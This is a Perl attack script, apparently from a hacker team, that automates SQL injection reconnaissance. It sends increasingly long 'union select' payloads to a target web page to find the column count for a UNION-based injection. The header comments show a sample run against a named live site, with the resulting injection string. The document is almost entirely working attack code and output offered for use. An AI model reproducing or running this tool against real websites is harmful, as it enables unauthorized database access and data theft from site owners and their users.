#!/usr/bin/perl 
#the cody find Table's No. 
#for union select in (access,mysql,mssql)
#Codz by SuperHei

#Team
#Security Angel
#Bugkidz Security Team

#Homepage
#http://www.4ngel.net
#http://www.darkne2s.org

# C:\tools>gettablenum.pl www.heibai.net 80 /down/show.php?id=5197 mysql_fetch_o
# The NO. is 2 .... Flase!
# The NO. is 3 .... Flase!
# The NO. is 4 .... Flase!
# The NO. is 5 .... Flase!
# The NO. is 6 .... Flase!
# The NO. is 7 .... Flase!
# The NO. is 8 .... Flase!
# The NO. is 9 .... Flase!
# The NO. is 10 .... Flase!
# The NO. is 11 .... Flase!
# The NO. is 12 .... Flase!
# The NO. is 13 .... Flase!
# The NO. is 14 .... Flase!
# The NO. is 15 .... Flase!
# The NO. is 16 .... Flase!
# The NO. is 17 .... Flase!
# The NO. is 18 .... Flase!

# The NO. is 19 .... OK!
# URl:
# %20union%20select%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
# C:\tools>


use IO::Socket; 

$ARGC = @ARGV; 
if ($ARGC != 4) 
{ 
	print "usage:$0  ww3.tty-1.net 808 /newdown/show.php?id=10 mysql_fetch_o\n"; 
	exit; 
} 


$host = @ARGV[0]; 
$port =@ARGV[1]; 
$way = @ARGV[2]; 
$judge=$ARGV[3]; 

for ($i=0;$i<100;$i++){ 
	$d=",1".$d; 
	$path1= "%20union%20select%201"."$d"; 
	$req = "GET $way$path1 HTTP/1.0\r\n". 
	"Referer: http://$host$way\r\n". 
	"Host:$host\n\n\n\n\n\n\n"; 

	@in = sock($req); 
	@num=grep /$judge/, @in; 
	$size=@num; 
	$n=$i+2; 
	if ($size > 0) { 
		print "The NO. is $n .... Flase!\n" ;} 
	else{ 
		print "\nThe NO. is $n .... OK!\n" ; 
		print "URl: \n$path1";exit; 
	} 
} 

sub sock{ 
	my ($req) = @_; 
	my $connection = IO::Socket::INET->new(Proto =>"tcp", 
	PeerAddr =>$host, 
	PeerPort =>$port) || die "Sorry! Could not connect to $host \n"; 

	print $connection $req; 
	my @res = <$connection>; 
	close $connection; 
	return @res; 
	sleep(1); 
}